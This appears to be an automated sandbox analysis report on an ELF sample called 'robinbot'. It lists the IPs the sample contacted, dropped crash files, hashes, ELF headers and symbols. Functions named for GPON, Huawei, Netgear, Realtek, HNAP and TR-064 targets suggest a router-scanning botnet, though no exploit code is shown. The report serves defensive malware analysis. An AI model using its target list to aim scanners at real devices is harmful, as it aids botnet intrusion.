http://purenetworks.com/HNAP1/	robinbot	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	robinbot	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
201.35.61.151	unknown	Brazil	8167	BrasilTelecomSA-FilialDistritoFederalBR	false
38.149.54.119	unknown	United States	174	COGENT-174US	false
109.170.137.181	unknown	United Kingdom	5413	AS5413GB	false
6.118.77.236	unknown	United States	3356	LEVEL3US	false
147.58.96.125	unknown	United States	1533	DNIC-AS-01533US	false
81.127.100.245	unknown	Italy	3269	ASN-IBSNAZIT	false
136.39.88.252	unknown	United States	16591	GOOGLE-FIBERUS	false
126.164.244.69	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
61.67.139.220	unknown	Taiwan; Republic of China (ROC)	18042	KBTKoosBroadbandTelecomTW	false
49.200.41.67	unknown	India	4804	MPX-ASMicroplexPTYLTDAU	false
18.73.84.40	unknown	United States	3	MIT-GATEWAYSUS	false
81.164.55.227	unknown	Belgium	6848	TELENET-ASBE	false
113.111.170.223	unknown	China	4816	CHINANET-IDC-GDChinaTelecomGroupCN	false
219.117.116.107	unknown	Japan	10010	TOKAITOKAICommunicationsCorporationJP	false
36.29.101.74	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
89.230.138.253	unknown	Poland	21021	MULTIMEDIA-ASCableDTVInternetVoiceProviderinPoland	false
62.215.115.222	unknown	Kuwait	21050	FAST-TELCOKW	false
59.144.17.163	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	false
175.92.178.233	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
18.180.127.60	unknown	United States	16509	AMAZON-02US	false
115.4.227.195	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
219.101.185.233	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
208.55.17.111	unknown	United States	21928	T-MOBILE-AS21928US	false
120.49.233.109	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
182.191.237.46	unknown	Pakistan	45595	PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK	false
191.16.96.219	unknown	Brazil	26599	TELEFONICABRASILSABR	false
223.25.130.150	unknown	Japan	55387	RMGR-MIXJapanCommunicationIncJP	false
114.178.65.194	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
190.146.127.103	unknown	Colombia	10620	TelmexColombiaSACO	false
99.214.230.161	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
160.154.217.169	unknown	Cote D'ivoire	29571	ORANGE-COTE-IVOIRECI	false
213.41.96.24	unknown	United Kingdom	8220	COLTCOLTTechnologyServicesGroupLimitedGB	false
167.180.120.161	unknown	United States	59447	SAYFANETTR	false
171.6.175.226	unknown	Thailand	45758	TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTH	false
195.69.176.12	unknown	Ukraine	3326	DATAGROUPDatagroupPJSCUA	false
187.192.10.153	unknown	Mexico	8151	UninetSAdeCVMX	false
207.16.176.208	unknown	United States	6620	AS-6620US	false
1.130.155.22	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
96.158.69.6	unknown	United States	7922	COMCAST-7922US	false
116.80.199.207	unknown	Japan	2514	INFOSPHERENTTPCCommunicationsIncJP	false
44.120.58.45	unknown	United States	7377	UCSDUS	false
57.101.184.167	unknown	Belgium	2647	SITABE	false
125.65.104.79	unknown	China	38283	CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetData	false
149.161.218.250	unknown	United States	87	INDIANA-ASUS	false
38.136.33.70	unknown	United States	174	COGENT-174US	false
203.244.68.31	unknown	Korea Republic of	18305	POSNETPOSCOICTKR	false
187.164.183.126	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	false
64.10.38.215	unknown	United States	701	UUNETUS	false
204.135.237.106	unknown	United States	7726	FITC-ASUS	false
220.148.44.31	unknown	Japan	10010	TOKAITOKAICommunicationsCorporationJP	false
49.59.1.175	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
173.3.155.16	unknown	United States	6128	CABLE-NET-1US	false
200.80.242.58	unknown	Argentina	11664	TechtelLMDSComunicacionesInteractivasSAAR	false
47.205.45.6	unknown	United States	5650	FRONTIER-FRTRUS	false
8.182.132.211	unknown	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
156.124.138.111	unknown	United States	393504	XNSTGCA	false
101.45.38.38	unknown	China	131536	SHGWBNNETShanghaiGreatWallBroadbandNetworkServiceCo	false
117.20.248.54	unknown	Korea Republic of	9981	SAERONET-AS-KRSaeroNetworkServiceLTDKR	false
101.13.223.104	unknown	Taiwan; Republic of China (ROC)	24158	TAIWANMOBILE-ASTaiwanMobileCoLtdTW	false
65.62.218.42	unknown	United States	32475	SINGLEHOP-LLCUS	false
122.143.153.102	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
125.152.192.190	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
166.252.209.73	unknown	United States	22394	CELLCOUS	false
22.253.251.152	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
147.79.180.251	unknown	United States	14327	PGE-ONLINEUS	false
187.176.30.239	unknown	Mexico	6503	AxtelSABdeCVMX	false
170.14.152.245	unknown	United States	27283	RJF-INTERNETUS	false
58.147.153.172	unknown	Afghanistan	17411	IO-GLOBAL-APIoGlobalServicesPvtLimitedAF	false
67.7.29.224	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
78.252.226.253	unknown	France	12322	PROXADFR	false
184.190.166.224	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
106.148.127.134	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
122.243.118.80	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
34.229.40.203	unknown	United States	14618	AMAZON-AESUS	false
199.87.129.117	unknown	United States	27326	VHSA-ASUS	false
51.27.141.208	unknown	United States	2686	ATGS-MMD-ASUS	false
199.33.243.208	unknown	United States	22772	LOGINUS	false
145.188.254.177	unknown	Netherlands	59524	KPN-IAASNL	false
182.129.102.216	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
131.154.12.44	unknown	Italy	137	ASGARRConsortiumGARREU	false
89.138.240.83	unknown	Israel	1680	NV-ASNCELLCOMltdIL	false
165.123.75.214	unknown	United States	55	UPENNUS	false
168.189.121.198	unknown	United States	53526	THECLO-ASNUS	false
74.178.232.94	unknown	United States	10796	TWC-10796-MIDWESTUS	false
28.6.132.123	unknown	United States	7922	COMCAST-7922US	false
124.193.153.100	unknown	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
120.149.220.29	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
82.130.119.117	unknown	Switzerland	559	SWITCHPeeringrequestspeeringswitchchEU	false
16.133.163.123	unknown	United States	unknown	unknown	false
208.71.205.168	unknown	United States	23038	BRDBND-USER-GRPUS	false
160.32.225.158	unknown	United States	32160	CTIFIBERUS	false
130.34.115.97	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
104.229.125.170	unknown	United States	11351	TWC-11351-NORTHEASTUS	false
208.17.252.190	unknown	United States	396445	QUICKINTLUS	false
142.225.10.214	unknown	Canada	395198	BANQUE-NATIONALE-DU-CANADACA	false
9.30.31.111	unknown	United States	3356	LEVEL3US	false
4.97.223.173	unknown	United States	3356	LEVEL3US	false
112.226.138.78	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
154.228.227.62	unknown	Uganda	37075	ZAINUGASUG	false
151.174.62.248	unknown	United States	45025	EDN-ASUA	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/var/crash/_usr_share_apport_apport-checkreports.1000.crash

Download File

Process:	/usr/share/apport/apport-checkreports
File Type:	ASCII text
Category:	dropped
Size (bytes):	14917
Entropy (8bit):	4.701159938603215
Encrypted:	false
SSDEEP:	192:FLzCpJfXz7bDknhn1tizSyu2WaxQEGUEPIyhbM:2Ah8UEGpI
MD5:	0836D275EE0CC43A1A0B61944975C4B6
SHA1:	38F30C9078B79D4B4D275FC6B44FA222DFBBF295
SHA-256:	362C8FBC76D80AE0B74BBAC80FC45FCA202202E57854E5F1083D986C1A154DA5
SHA-512:	45AB12EBD03E2E5FC9E896D93B4B01A3E2161C46DFE37C5B9A450802963F29A000079D885F815CF026828C13301B89DBC54722F7C32D23D5BFC3059EA67E6F89
Malicious:	false
Reputation:	low
Preview:	ProblemType: Crash.Date: Tue Nov 29 17:27:51 2022.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 019cc000-01d24000 rw-p 00000000 00:00 0 [heap]. 7f318448b000-7f318460c000 rw-p 00000000 00:00 0 . 7f318460c000-7f3184623000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f3184623000-7f3184822000 ---p 00017000 fc:0

/var/crash/_usr_share_apport_apport-gtk.1000.crash

Download File

Process:	/usr/share/apport/apport-gtk
File Type:	ASCII text
Category:	dropped
Size (bytes):	47095
Entropy (8bit):	4.52783605085601
Encrypted:	false
SSDEEP:	384:rJP5bFpeBAm/H/B/Z/JTFdMJ3iSdO2F1qWOcxxsEfXNJQv4eIz/N8CcZAE6S:A/H/B/Z/LdMJ4WOcxxs94eIz/N8CcZAG
MD5:	DB7F79EB6BC1343703D5FCFF8A831D12
SHA1:	B55C93B9B8770E4B030AAC5D8334D140DB04EAC0
SHA-256:	995704D9EAF0F17623400C8CDF0DA870E4AD91C248ADD3B1392C3D8037F00BF5
SHA-512:	69BD12B24F60C5BCBD64ED08A82B3D885B368511AD56768EBDE8ABDEDA6F25A460F47132A010AEDABEAB4437D62ADE2F821E2FE69BAE306F740C5B1492953A42
Malicious:	false
Reputation:	low
Preview:	ProblemType: Crash.Date: Tue Nov 29 17:27:52 2022.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01dbe000-022de000 rw-p 00000000 00:00 0 [heap]. 7f56d93c2000-7f56d94c2000 rw-p 00000000 00:00 0 . 7f56d94c2000-7f56d94d9000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f56d94d9000-7f56d96d8000 ---p 00017000 fc:00 2382

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
Entropy (8bit):	6.25564436844842
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	robinbot
File size:	133298
MD5:	500009d8f68330a8f82b59884a9afe47
SHA1:	575f5e6894b1a2f7a728435487666acdb9758f83
SHA256:	a46770913fba87921b56d789396e07cdfd68a846b2e80a77aa07e1c62f9304d6
SHA512:	ec62621ec2e037cb9f3890486ff4fb127ee6b34657ee7c2b1e3401de5d7fa2bb554e62d5c378dd93c43a3bb0bf4d210556cf8e67c0ff8449d0c615262e94dfba
SSDEEP:	3072:xffIDJOocVBUbd8A2W3M/fvLUpANet2xBTd:xgDAtVmB8sM/fvLUpANet2xBTd
TLSH:	CED306C76E527DBBC2C6EAF96AFBE01084E3B839576A224077C47DA5190ECC41D2D309
File Content Preview:	.ELF..............>.......@.....@...................@.8...@.......................@.......@......}.......}................................Q.......Q.....h........5..............Q.td....................................................H...._....J...H........

Static ELF Info

ELF header
Class:
Data:
Version:
Machine:
Version Number:
Type:
OS/ABI:
ABI Version:
Entry Point Address:
Flags:
ELF Header Size:
Program Header Offset:
Program Header Size:
Number of Program Headers:
Section Header Offset:
Section Header Size:
Number of Section Headers:
Header String Table Index:

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.init	PROGBITS	0x4000e8	0xe8	0x13	0x0	0x6	AX	0	0	1
.text	PROGBITS	0x400100	0x100	0x11678	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x411778	0x11778	0xe	0x0	0x6	AX	0	0	1
.rodata	PROGBITS	0x4117a0	0x117a0	0x65f1	0x0	0x2	A	0	0	32
.eh_frame	PROGBITS	0x417d94	0x17d94	0x4	0x0	0x2	A	0	0	4
.ctors	PROGBITS	0x518000	0x18000	0x10	0x0	0x3	WA	0	0	8
.dtors	PROGBITS	0x518010	0x18010	0x10	0x0	0x3	WA	0	0	8
.jcr	PROGBITS	0x518020	0x18020	0x8	0x0	0x3	WA	0	0	8
.data	PROGBITS	0x518040	0x18040	0x528	0x0	0x3	WA	0	0	32
.bss	NOBITS	0x518580	0x18568	0x2f90	0x0	0x3	WA	0	0	32
.comment	PROGBITS	0x0	0x18568	0xc18	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x19180	0x66	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x195a8	0x4bd8	0x18	0x0		14	272	8
.strtab	STRTAB	0x0	0x1e180	0x2732	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x17d98	0x17d98	6.6680	0x5	R E	0x100000	.init .text .fini .rodata .eh_frame
LOAD	0x18000	0x518000	0x518000	0x568	0x3510	2.1532	0x6	RW	0x100000	.ctors .dtors .jcr .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8

Symbols

Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x4000e8	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x400100	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x411778	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x4117a0	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x417d94	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x518000	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x518010	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x518020	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x518040	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x518580	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	14
CROSSWEB_IPGen	.symtab	0x4031f0	246	FUNC	<unknown>	DEFAULT	2
DLINK_IPGen	.symtab	0x402e90	246	FUNC	<unknown>	DEFAULT	2
GPON1_Range	.symtab	0x518080	20	OBJECT	<unknown>	DEFAULT	9
GPON2_Range	.symtab	0x5180a0	112	OBJECT	<unknown>	DEFAULT	9
GPON8080_IPGen	.symtab	0x405800	1311	FUNC	<unknown>	DEFAULT	2
GPON80_IPGen	.symtab	0x405170	1508	FUNC	<unknown>	DEFAULT	2
HNAP_IPGen	.symtab	0x4033b0	246	FUNC	<unknown>	DEFAULT	2
HUAWEI_IPGen	.symtab	0x4037d0	1164	FUNC	<unknown>	DEFAULT	2
JAWS_IPGen	.symtab	0x403050	246	FUNC	<unknown>	DEFAULT	2
LOCAL_ADDR	.symtab	0x51aa04	4	OBJECT	<unknown>	DEFAULT	10
NETGEAR_IPGen	.symtab	0x403d80	2312	FUNC	<unknown>	DEFAULT	2
R7000_IPGen	.symtab	0x402cd0	246	FUNC	<unknown>	DEFAULT	2
REALTEK_IPGen	.symtab	0x4047c0	2312	FUNC	<unknown>	DEFAULT	2
TR064_IPGen	.symtab	0x403610	246	FUNC	<unknown>	DEFAULT	2
VARCON_IPGen	.symtab	0x402b30	246	FUNC	<unknown>	DEFAULT	2
_Jv_RegisterClasses	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_READ.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_WRITE.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__CTOR_END__	.symtab	0x518008	0	OBJECT	<unknown>	DEFAULT	6
__CTOR_LIST__	.symtab	0x518000	0	OBJECT	<unknown>	DEFAULT	6
__C_ctype_b	.symtab	0x518510	8	OBJECT	<unknown>	DEFAULT	9
__C_ctype_b.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_b_data	.symtab	0x417620	768	OBJECT	<unknown>	DEFAULT	4
__C_ctype_tolower	.symtab	0x518520	8	OBJECT	<unknown>	DEFAULT	9
__C_ctype_tolower.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__C_ctype_tolower_data	.symtab	0x417920	768	OBJECT	<unknown>	DEFAULT	4
__DTOR_END__	.symtab	0x518018	0	OBJECT	<unknown>	DEFAULT	7
__DTOR_LIST__	.symtab	0x518010	0	OBJECT	<unknown>	DEFAULT	7
__EH_FRAME_BEGIN__	.symtab	0x417d94	0	OBJECT	<unknown>	DEFAULT	5
__FRAME_END__	.symtab	0x417d94	0	OBJECT	<unknown>	DEFAULT	5
__GI___C_ctype_b	.symtab	0x518510	8	OBJECT	<unknown>	HIDDEN	9
__GI___C_ctype_b_data	.symtab	0x417620	768	OBJECT	<unknown>	HIDDEN	4
__GI___C_ctype_tolower	.symtab	0x518520	8	OBJECT	<unknown>	HIDDEN	9
__GI___C_ctype_tolower_data	.symtab	0x417920	768	OBJECT	<unknown>	HIDDEN	4
__GI___ctype_b	.symtab	0x518518	8	OBJECT	<unknown>	HIDDEN	9
__GI___ctype_tolower	.symtab	0x518528	8	OBJECT	<unknown>	HIDDEN	9
__GI___errno_location	.symtab	0x409928	6	FUNC	<unknown>	HIDDEN	2
__GI___fgetc_unlocked	.symtab	0x411394	222	FUNC	<unknown>	HIDDEN	2
__GI___glibc_strerror_r	.symtab	0x40b274	14	FUNC	<unknown>	HIDDEN	2
__GI___h_errno_location	.symtab	0x40e7ac	6	FUNC	<unknown>	HIDDEN	2
__GI___libc_fcntl	.symtab	0x40934c	100	FUNC	<unknown>	HIDDEN	2
__GI___libc_lseek	.symtab	0x40e4e4	45	FUNC	<unknown>	HIDDEN	2
__GI___libc_open	.symtab	0x409514	106	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_fini	.symtab	0x40dde8	70	FUNC	<unknown>	HIDDEN	2
__GI___uClibc_init	.symtab	0x40de67	67	FUNC	<unknown>	HIDDEN	2
__GI___xpg_strerror_r	.symtab	0x40b284	194	FUNC	<unknown>	HIDDEN	2
__GI__exit	.symtab	0x40e1dc	42	FUNC	<unknown>	HIDDEN	2
__GI_abort	.symtab	0x40d178	276	FUNC	<unknown>	HIDDEN	2
__GI_atoi	.symtab	0x40d7ac	18	FUNC	<unknown>	HIDDEN	2
__GI_bind	.symtab	0x40bd48	43	FUNC	<unknown>	HIDDEN	2
__GI_brk	.symtab	0x410284	43	FUNC	<unknown>	HIDDEN	2
__GI_clock_getres	.symtab	0x40e208	41	FUNC	<unknown>	HIDDEN	2
__GI_close	.symtab	0x4093b0	41	FUNC	<unknown>	HIDDEN	2
__GI_closedir	.symtab	0x409730	116	FUNC	<unknown>	HIDDEN	2
__GI_connect	.symtab	0x40bd74	43	FUNC	<unknown>	HIDDEN	2
__GI_dup2	.symtab	0x4093dc	44	FUNC	<unknown>	HIDDEN	2
__GI_errno	.symtab	0x51a93c	4	OBJECT	<unknown>	HIDDEN	10
__GI_execl	.symtab	0x40d994	287	FUNC	<unknown>	HIDDEN	2
__GI_execve	.symtab	0x40e234	38	FUNC	<unknown>	HIDDEN	2
__GI_exit	.symtab	0x40d938	92	FUNC	<unknown>	HIDDEN	2
__GI_fclose	.symtab	0x4102f4	259	FUNC	<unknown>	HIDDEN	2
__GI_fcntl	.symtab	0x40934c	100	FUNC	<unknown>	HIDDEN	2
__GI_fcntl64	.symtab	0x40934c	100	FUNC	<unknown>	HIDDEN	2
__GI_fflush_unlocked	.symtab	0x410900	329	FUNC	<unknown>	HIDDEN	2
__GI_fgetc_unlocked	.symtab	0x411394	222	FUNC	<unknown>	HIDDEN	2
__GI_fgets	.symtab	0x4107b8	109	FUNC	<unknown>	HIDDEN	2
__GI_fgets_unlocked	.symtab	0x410a4c	116	FUNC	<unknown>	HIDDEN	2
__GI_fopen	.symtab	0x4103f8	10	FUNC	<unknown>	HIDDEN	2
__GI_fork	.symtab	0x409408	38	FUNC	<unknown>	HIDDEN	2
__GI_fputs_unlocked	.symtab	0x40ab50	56	FUNC	<unknown>	HIDDEN	2
__GI_fseek	.symtab	0x410404	5	FUNC	<unknown>	HIDDEN	2
__GI_fseeko64	.symtab	0x41040c	218	FUNC	<unknown>	HIDDEN	2
__GI_fstat	.symtab	0x40e25c	82	FUNC	<unknown>	HIDDEN	2
__GI_fstat64	.symtab	0x40e25c	82	FUNC	<unknown>	HIDDEN	2
__GI_fwrite_unlocked	.symtab	0x40ab88	134	FUNC	<unknown>	HIDDEN	2
__GI_getc_unlocked	.symtab	0x411394	222	FUNC	<unknown>	HIDDEN	2
__GI_getdtablesize	.symtab	0x40e3dc	35	FUNC	<unknown>	HIDDEN	2
__GI_getegid	.symtab	0x40e400	38	FUNC	<unknown>	HIDDEN	2
__GI_geteuid	.symtab	0x40e428	38	FUNC	<unknown>	HIDDEN	2
__GI_getgid	.symtab	0x40e450	38	FUNC	<unknown>	HIDDEN	2
__GI_gethostbyname	.symtab	0x40b98c	53	FUNC	<unknown>	HIDDEN	2
__GI_gethostbyname_r	.symtab	0x40b9c4	897	FUNC	<unknown>	HIDDEN	2
__GI_getpagesize	.symtab	0x40e478	19	FUNC	<unknown>	HIDDEN	2
__GI_getpid	.symtab	0x409430	38	FUNC	<unknown>	HIDDEN	2
__GI_getrlimit	.symtab	0x40e48c	40	FUNC	<unknown>	HIDDEN	2
__GI_getsockname	.symtab	0x40bda0	41	FUNC	<unknown>	HIDDEN	2
__GI_getuid	.symtab	0x40e4b4	38	FUNC	<unknown>	HIDDEN	2
__GI_h_errno	.symtab	0x51a940	4	OBJECT	<unknown>	HIDDEN	10
__GI_inet_addr	.symtab	0x410d70	28	FUNC	<unknown>	HIDDEN	2
__GI_inet_aton	.symtab	0x40f7fc	137	FUNC	<unknown>	HIDDEN	2
__GI_inet_ntop	.symtab	0x40b77c	527	FUNC	<unknown>	HIDDEN	2
__GI_inet_pton	.symtab	0x40b477	493	FUNC	<unknown>	HIDDEN	2
__GI_initstate_r	.symtab	0x40d5a3	185	FUNC	<unknown>	HIDDEN	2
__GI_ioctl	.symtab	0x409480	104	FUNC	<unknown>	HIDDEN	2
__GI_isatty	.symtab	0x40b364	25	FUNC	<unknown>	HIDDEN	2
__GI_kill	.symtab	0x4094e8	44	FUNC	<unknown>	HIDDEN	2
__GI_listen	.symtab	0x40be00	44	FUNC	<unknown>	HIDDEN	2
__GI_lseek	.symtab	0x40e4e4	45	FUNC	<unknown>	HIDDEN	2
__GI_lseek64	.symtab	0x40e4dc	5	FUNC	<unknown>	HIDDEN	2
__GI_memchr	.symtab	0x40f538	240	FUNC	<unknown>	HIDDEN	2
__GI_memcpy	.symtab	0x40ac10	102	FUNC	<unknown>	HIDDEN	2
__GI_memmove	.symtab	0x40aec4	734	FUNC	<unknown>	HIDDEN	2
__GI_mempcpy	.symtab	0x40f250	90	FUNC	<unknown>	HIDDEN	2
__GI_memrchr	.symtab	0x40f628	237	FUNC	<unknown>	HIDDEN	2
__GI_memset	.symtab	0x40ac80	210	FUNC	<unknown>	HIDDEN	2
__GI_mmap	.symtab	0x40e194	48	FUNC	<unknown>	HIDDEN	2
__GI_mremap	.symtab	0x40e514	42	FUNC	<unknown>	HIDDEN	2
__GI_munmap	.symtab	0x40e540	38	FUNC	<unknown>	HIDDEN	2
__GI_nanosleep	.symtab	0x40e568	38	FUNC	<unknown>	HIDDEN	2
__GI_open	.symtab	0x409514	106	FUNC	<unknown>	HIDDEN	2
__GI_opendir	.symtab	0x4097a4	243	FUNC	<unknown>	HIDDEN	2
__GI_poll	.symtab	0x4102c8	41	FUNC	<unknown>	HIDDEN	2
__GI_printf	.symtab	0x409960	157	FUNC	<unknown>	HIDDEN	2
__GI_raise	.symtab	0x410258	18	FUNC	<unknown>	HIDDEN	2
__GI_random	.symtab	0x40d298	72	FUNC	<unknown>	HIDDEN	2
__GI_random_r	.symtab	0x40d4a0	90	FUNC	<unknown>	HIDDEN	2
__GI_rawmemchr	.symtab	0x410c00	190	FUNC	<unknown>	HIDDEN	2
__GI_read	.symtab	0x4095b8	39	FUNC	<unknown>	HIDDEN	2
__GI_readdir	.symtab	0x409898	143	FUNC	<unknown>	HIDDEN	2
__GI_readlink	.symtab	0x4095e0	39	FUNC	<unknown>	HIDDEN	2
__GI_recv	.symtab	0x40be2c	11	FUNC	<unknown>	HIDDEN	2
__GI_recvfrom	.symtab	0x40be38	45	FUNC	<unknown>	HIDDEN	2
__GI_sbrk	.symtab	0x40e590	74	FUNC	<unknown>	HIDDEN	2
__GI_select	.symtab	0x409608	44	FUNC	<unknown>	HIDDEN	2
__GI_send	.symtab	0x40be68	11	FUNC	<unknown>	HIDDEN	2
__GI_sendto	.symtab	0x40be74	48	FUNC	<unknown>	HIDDEN	2
__GI_setsid	.symtab	0x409634	38	FUNC	<unknown>	HIDDEN	2
__GI_setsockopt	.symtab	0x40bea4	53	FUNC	<unknown>	HIDDEN	2
__GI_setstate_r	.symtab	0x40d3f8	168	FUNC	<unknown>	HIDDEN	2
__GI_sigaction	.symtab	0x40e09d	247	FUNC	<unknown>	HIDDEN	2
__GI_sigaddset	.symtab	0x40bf0c	35	FUNC	<unknown>	HIDDEN	2
__GI_sigemptyset	.symtab	0x40bf30	20	FUNC	<unknown>	HIDDEN	2
__GI_signal	.symtab	0x40bf44	168	FUNC	<unknown>	HIDDEN	2
__GI_sigprocmask	.symtab	0x40965c	85	FUNC	<unknown>	HIDDEN	2
__GI_sleep	.symtab	0x40dab4	415	FUNC	<unknown>	HIDDEN	2
__GI_snprintf	.symtab	0x409a00	137	FUNC	<unknown>	HIDDEN	2
__GI_socket	.symtab	0x40bedc	47	FUNC	<unknown>	HIDDEN	2
__GI_sprintf	.symtab	0x409a8c	149	FUNC	<unknown>	HIDDEN	2
__GI_srandom_r	.symtab	0x40d4fa	169	FUNC	<unknown>	HIDDEN	2
__GI_strcasecmp	.symtab	0x411474	48	FUNC	<unknown>	HIDDEN	2
__GI_strchr	.symtab	0x40f2b0	417	FUNC	<unknown>	HIDDEN	2
__GI_strcmp	.symtab	0x410ac0	33	FUNC	<unknown>	HIDDEN	2
__GI_strcoll	.symtab	0x410ac0	33	FUNC	<unknown>	HIDDEN	2
__GI_strcpy	.symtab	0x40f460	213	FUNC	<unknown>	HIDDEN	2
__GI_strcspn	.symtab	0x40ad58	135	FUNC	<unknown>	HIDDEN	2
__GI_strdup	.symtab	0x410d38	54	FUNC	<unknown>	HIDDEN	2
__GI_strlen	.symtab	0x40ade0	225	FUNC	<unknown>	HIDDEN	2
__GI_strncat	.symtab	0x410cc0	119	FUNC	<unknown>	HIDDEN	2
__GI_strncpy	.symtab	0x40f718	131	FUNC	<unknown>	HIDDEN	2
__GI_strnlen	.symtab	0x40b1a4	206	FUNC	<unknown>	HIDDEN	2
__GI_strpbrk	.symtab	0x410ae8	140	FUNC	<unknown>	HIDDEN	2
__GI_strspn	.symtab	0x410b78	135	FUNC	<unknown>	HIDDEN	2
__GI_strtok	.symtab	0x40b358	10	FUNC	<unknown>	HIDDEN	2
__GI_strtok_r	.symtab	0x40f79c	94	FUNC	<unknown>	HIDDEN	2
__GI_strtol	.symtab	0x40d7c0	10	FUNC	<unknown>	HIDDEN	2
__GI_strtoll	.symtab	0x40d7c0	10	FUNC	<unknown>	HIDDEN	2
__GI_sysconf	.symtab	0x40dc54	351	FUNC	<unknown>	HIDDEN	2
__GI_tcgetattr	.symtab	0x40b380	110	FUNC	<unknown>	HIDDEN	2
__GI_time	.symtab	0x4096b4	39	FUNC	<unknown>	HIDDEN	2
__GI_times	.symtab	0x40e5dc	39	FUNC	<unknown>	HIDDEN	2
